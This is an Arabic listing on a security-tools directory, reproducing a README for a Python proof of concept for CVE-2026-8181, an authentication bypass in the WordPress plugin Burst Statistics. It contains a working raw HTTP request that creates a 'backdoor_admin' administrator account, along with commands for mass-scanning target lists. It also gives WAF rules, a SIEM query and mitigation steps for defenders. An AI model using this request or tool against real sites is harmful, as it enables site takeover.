Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2026-8181-PoC — Python PoC لـ CVE-2026-8181، وهو تجاوز للمصادقة حرج في إضافة Burst Statistics الخاصة بووردبريس. يتضمن أتمتة الاستغلال، الفحص الشامل، وإنشاء حساب مسؤول لاختبار الأمان المصرح به. | Kitploit
أدوات/GitHubGitHub/squamity/cve-2026-8181-poc
أدوات دفاعيةتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالمصادقةالتعلم والتعليمالفريق الأحمر
GitHubsquamity/cve-2026-8181-poc

CVE-2026-8181-PoC

Python PoC لـ CVE-2026-8181، وهو تجاوز للمصادقة حرج في إضافة Burst Statistics الخاصة بووردبريس. يتضمن أتمتة الاستغلال، الفحص الشامل، وإنشاء حساب مسؤول لاختبار الأمان المصرح به.

عرض المستودع
5منذ شهر واحدلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

🚨 CVE-2026-8181 | تجاوز المصادقة في إحصائيات Burst

CVE-2026-8181 CVSS WordPress Plugin Affected Versions Actively Exploited

[!CAUTION] تنبيه بالغ الأهمية: تسمح هذه الثغرة لمهاجم عن بُعد غير موثَّق بتجاوز المصادقة والحصول على صلاحيات المسؤول الكاملة على موقع WordPress المستهدف بمجرد حقن رأس HTTP مخصص. يتم حاليًا استغلال CVE هذه بنشاط في البرية.


📑 جدول المحتويات

  1. ملخص تنفيذي
  2. 🔬 تحليل عميق: تحليل السبب الجذري
  3. ⚔️ دليل الهجوم: الاستغلال
  4. 🛡️ دليل الدفاع: الكشف والتخفيف
  5. 🛠️ استخدام أداة إثبات المفهوم
  6. المراجع وإخلاء المسؤولية

📖 ملخص تنفيذي

CVE-2026-8181 هي ثغرة خطيرة في تجاوز المصادقة تؤثر على إضافة إحصائيات Burst لووردبريس (الإصدارات من 3.4.0 إلى 3.4.1.1). يكمن الخلل في تكامل الوكيل الرئيسي (MainWP) الخاص بالإضافة. بسبب التحقق غير السليم من كلمات مرور التطبيق خلال الخطاف المبكر plugins_loaded، تمنح الإضافة بشكل غير صحيح سياقًا إداريًا لطلبات REST API التي تتضمن الرأس X-BurstMainWP: 1، حتى لو كان الطلب يفتقر إلى بيانات اعتماد صالحة.

يؤدي هذا إلى تحويل طلب HTTP بسيط وغير موثَّق إلى استيلاء كامل على صلاحيات المسؤول، متجاوزًا جميع آليات مصادقة ووردبريس القياسية.


🔬 تحليل عميق: تحليل السبب الجذري

لفهم كيف يمنح رأس بسيط مفاتيح المملكة، يجب علينا تحليل منطق PHP داخل معالج المصادقة في الإضافة.

تدفق المنطق المعرض للخطر

ينبع الخلل من فرع شرطي تم التعامل معه بشكل غير صحيح في includes/Frontend/class-mainwp-proxy.php داخل طريقة is_mainwp_authenticated().

  1. المُحفِّز: تسجّل الإضافة init() على plugins_loaded بأولوية 9. هذا مبكر جدًا في دورة حياة ووردبريس.
  2. الخطاف: عندما يحمل الطلب الرأس X-BurstMainWP: 1، تفوّض has_admin_access() المصادقة إلى is_mainwp_authenticated().
  3. الاستدعاء الأساسي: تقرأ الطريقة رأس Authorization وتُمرر بيانات الاعتماد إلى الدالة الأساسية wp_authenticate_application_password().
  4. الخلل القاتل (CWE-287): نظرًا لأن REST API لم يقم بعد بتعيين عامل التصفية application_password_is_api_request إلى true (بسبب تنفيذ الخطاف المبكر)، فإن الدالة الأساسية تُرجع null بدلاً من كائن WP_Error.

تمثيل شبه رمزي

root@kitploit:~
// تمثيل مبسط للكود المعرض للخطر في Burst Statistics <= 3.4.1.1
$user = wp_authenticate_application_password( null, $username, $password );

if ( is_wp_error( $user ) ) {
    return false; // يعالج بشكل صحيح حالات فشل المصادقة الصريحة
}

// 🚨 الخلل القاتل 🚨
// إذا لم يتم تقديم كلمة مرور تطبيق أو لم يتم وضع علامة على طلب API بعد،
// تُرجع wp_authenticate_application_password القيمة NULL.
// يفشل الكود في التحقق من NULL!
if ( $user === null ) {
    // بدلاً من الفشل بشكل آمن، يمر إلى هذا الفرع غير الآمن:
    $admin_user = get_user_by( 'login', $attacker_supplied_username );
    wp_set_current_user( $admin_user->ID ); // انفجار: تم منح سياق المسؤول!
    return true;
}

⚔️ دليل الهجوم: الاستغلال

هذا القسم مخصص لأعضاء الفرق الحمراء ومختبرّي الاختراق المصرح لهم.

سلسلة الهجوم

  1. الاستطلاع: تحديد أن الهدف يدير Burst Statistics <= 3.4.1.1 (على سبيل المثال، عبر /wp-content/plugins/burst-statistics/readme.txt).
  2. استخراج المستخدمين: العثور على اسم مستخدم مسؤول صالح. غالبًا ما يكشف REST API الخاص بووردبريس عنهم عبر GET /wp-json/wp/v2/users. إذا تم حظره، استخدم حيلة أرشيف المؤلف: /?author=1.
  3. بناء الحمولة: صياغة طلب HTTP POST لإنشاء مستخدم جديد: POST /wp-json/wp/v2/users.
  4. حقن الرأس: حقن الرؤوس السحرية:
    • X-BurstMainWP: 1
    • Authorization: Basic <base64(admin_username:fake_password)>
  5. التنفيذ: يعالج الخادم الطلب، ويصطدم بالفحص الخاطئ null، ويرفع الطلب إلى سياق المسؤول. يتم إنشاء المستخدم المسؤول الجديد.

مثال على طلب HTTP الخام

root@kitploit:~
POST /wp-json/wp/v2/users HTTP/1.1
Host: target.com
X-BurstMainWP: 1
Authorization: Basic YWRtaW46ZmFrZV9wYXNzd29yZA==
Content-Type: application/json

{
  "username": "backdoor_admin",
  "password": "SuperSecretPassword123!",
  "email": "[email protected]",
  "roles": ["administrator"]
}

[!IMPORTANT] تحذير بيئي: يتطلب هذا الاستغلال وصول رأس Authorization إلى PHP.

  • Nginx / LiteSpeed / Apache مع روابط جميلة (Pretty Permalinks): يتم توجيه الرأس. الاستغلال ينجح.
  • Apache مع روابط عادية (Plain Permalinks) (افتراضي): يتم حذف الرأس بصمت بواسطة خادم الويب. الاستغلال يفشل.

🛡️ دليل الدفاع: الكشف والتخفيف

هذا القسم مخصص للفرق الزرقاء ومحللي SOC ومديري الأنظمة.

🕵️ استراتيجيات الكشف

1. قواعد جدار حماية تطبيقات الويب (WAF)

حظر أو مراقبة الرأس المحدد عند الحافة.

قاعدة ModSecurity / OWASP CRS:

root@kitploit:~
SecRule REQUEST_HEADERS:X-BurstMainWP "@streq 1" \
    "id:1000001, \
    phase:1, \
    deny, \
    status:403, \
    log, \
    msg:'CVE-2026-8181: Burst Statistics Auth Bypass Attempt', \
    tag:'CVE-2026-8181', \
    severity:'CRITICAL'"

قاعدة WAF مخصصة في Cloudflare:

(http.request.headers["X-BurstMainWP"] eq "1")


2. تحليل السجلات واستعلامات SIEM

ابحث في سجلات خادم الويب عن وجود الرأس مقترنًا بإنشاء مستخدم عبر REST API.

استعلام Splunk / ELK:

root@kitploit:~
index=web_logs ("X-BurstMainWP"="1" OR "x-burstmainwp"="1") AND uri="/wp-json/wp/v2/users" AND method="POST"
| stats count by src_ip, uri
| where count > 0

3. مؤشرات الاختراق (IoCs)

إذا كنت تشك في حدوث اختراق، ابحث عن هذه الآثار بعد الاستغلال:

  • مستخدمون مسؤولون جدد: تحقق من جدول wp_users بحثًا عن مستخدمين تم إنشاؤهم عبر REST API بدور administrator.
  • إضافات مشبوهة: تحقق من wp-content/plugins/ بحثًا عن تحميلات غير مصرح بها (غالبًا ما تكون صدفات ويب متنكرة في صورة إضافات شرعية).
  • ملفات معدلة: تحقق من التغييرات غير المصرح بها في wp-content/themes/ أو الملفات الأساسية.

🛡️ التخفيف والمعالجة

[!IMPORTANT] إجراء فوري مطلوب: إذا كنت تستخدم إصدارًا معرضًا للخطر، فقم بتطبيق أحد الإجراءات التخفيفية التالية فورًا.


🛠️ استخدام أداة إثبات المفهوم

يحتوي هذا المستودع على CVE-2026-8181.py، وهي أداة أتمتة بلغة Python للتحقق من الثغرة في بيئات المختبر المصرح بها.

الميزات


بداية سريعة

root@kitploit:~
# 1. تثبيت التبعيات
pip3 install requests urllib3

# 2. استطلاع موقع واحد وتوفير مسؤول جديد تلقائيًا
python3 CVE-2026-8181.py -u http://lab.local -U admin --create-user -o report.txt -k

# 3. فحص جماعي مع ملف نجاح مشترك
python3 CVE-2026-8181.py -f targets.txt -j 20 -o successes.txt -k

# 4. فحص جماعي مع تقارير فردية لكل مضيف
python3 CVE-2026-8181.py -f targets.txt -j 20 --output-dir ./results -k

📚 المراجع والإشادات

  • الاكتشاف الأصلي: Chloe Chamberland & PRISM (Wordfence Threat Intelligence)
  • سجل CVE: MITRE CVE-2026-8181
  • تفاصيل NVD: NIST NVD
  • دليل الإضافة: إحصائيات Burst

⚖️ إخلاء المسؤولية

[!WARNING] لأغراض تعليمية واختبارية مرخصة فقط.

المعلومات المقدمة في هذا المستودع هي لأغراض تعليمية وبحث أمني واختبار اختراق مرخص. استغلال الثغرات ضد الأنظمة دون إذن كتابي صريح من مالك النظام هو غير قانوني وينتهك قوانين الإنترنت الدولية.

يتحمل مؤلفو ومساهمو هذا المستودع عدم المسؤولية ولا يتحملون أي مسؤولية عن أي إساءة استخدام أو أضرار أو عواقب قانونية تنشأ عن استخدام هذه الأداة أو المعلومات. ابق اختراقك أخلاقيًا ومسؤولًا دائمًا.


بُني بـ ❤️ بواسطة Squamity | يُصان لأغراض تعليمية هجومية ودفاعية
تنزيل الأداة
  • التجاوز: تتحقق الإضافة فقط من is_wp_error( $user ). نظرًا لأن null ليس WP_Error، فإن الحارس يعبر.
  • الاستيلاء: يمر الكود إلى فرع غير آمن، مستدعيًا wp_set_current_user() باستخدام اسم المستخدم الذي قدمه المهاجم، مما يرفع الطلب فورًا إلى سياق مسؤول كامل.
  • الأولويةالإجراءالتفاصيل
    P0تحديث الإضافةقم بتحديث إحصائيات Burst إلى الإصدار 3.4.2 أو أعلى فورًا عبر لوحة تحكم ووردبريس.
    P1التصحيح الافتراضي لـ WAFإذا لم تتمكن من التحديث فورًا، فقم بنشر قواعد WAF (أعلاه) لحظر الرأس X-BurstMainWP.
    P2تقييد استخراج المستخدميناستخدم إضافة أمنية أو قواعد .htaccess لمنع الوصول العام إلى /wp-json/wp/v2/users و /?author=*.
    P3تدقيق المستخدمين والملفاتقم بتشغيل برنامج نصي لتدقيق حسابات المسؤول التي تم إنشاؤها مؤخرًا وإلغاء أي وصول غير مصرح به. افحص بحثًا عن صدفات الويب.
    الميزةالوصف
    🎯 هدف واحدفحص موقع محدد باستخدام العلامة -u.
    📦 عمليات جماعيةتغذية قائمة من الأهداف عبر -f targets.txt (يدعم # للتعليقات).
    ⚡ التزامنتسريع الفحوصات الجماعية باستخدام خيوط عاملة (-j N).
    💾 مخرجات ذكية-o file.txt لتقرير مشترك. في الوضع الجماعي، يتم تسجيل الاستغلالات الناجحة فقط.
    📂 تفريغ لكل مضيفاستخدم --output-dir لحفظ ملفات .txt فردية لكل مضيف تم اختراقه.
    👤 إنشاء مسؤولمرر --create-user لتوفير حساب مسؤول جديد تلقائيًا عبر REST API.
    🔓 TLS للمختبراستخدم -k لتجاهل أخطاء شهادة SSL (صرامة لبيئات المختبر الموثوقة المحلية).